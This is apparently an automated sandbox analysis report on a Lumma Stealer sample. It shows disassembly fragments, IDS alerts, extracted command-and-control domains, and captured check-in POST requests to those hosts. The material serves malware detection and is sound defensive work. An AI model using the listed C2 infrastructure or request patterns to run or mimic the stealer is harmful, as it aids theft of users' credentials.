                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_009AC98D
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_009BA9DE
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_009A89C0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00996907
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov eax, edx0_2_0099C921
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_009AC94B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_00989967
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_00989967
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_00989967
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0098EAA2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0098DA09
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0098DA09
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0098ABA7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edx, ecx0_2_0098ABA7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_009A5BF7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ecx, di0_2_009A5BF7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0098CB7E
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov esi, eax0_2_009A3C9B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_009A9C17
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0099EC17
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_009BBC08
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_009B6C3B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_009BCD87
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009BAD19
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_009B6E67
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0098DF8C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_009BCFC7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [ebx], dx0_2_00998F35
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00998F35
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00995F79
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009A1F77

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.6:55850 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.6:55798 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.6:64794 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.6:49707 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:54117 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.6:53158 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.6:49707
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.6:53437 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:57789 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.6:49709 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.6:58694 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.6:64656 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.6:49709
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49716 -> 104.121.10.34:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 178.62.201.34:443
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: Joe Sandbox ViewIP Address: 178.62.201.34 178.62.201.34
                  Source: Joe Sandbox ViewIP Address: 104.121.10.34 104.121.10.34
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.121.10.34:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 178.62.201.34:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 's equals www.youtube.com (Youtube)
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ps://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313690729.0000000000773000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252151809.0000000000773000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api1uoi
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steams
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
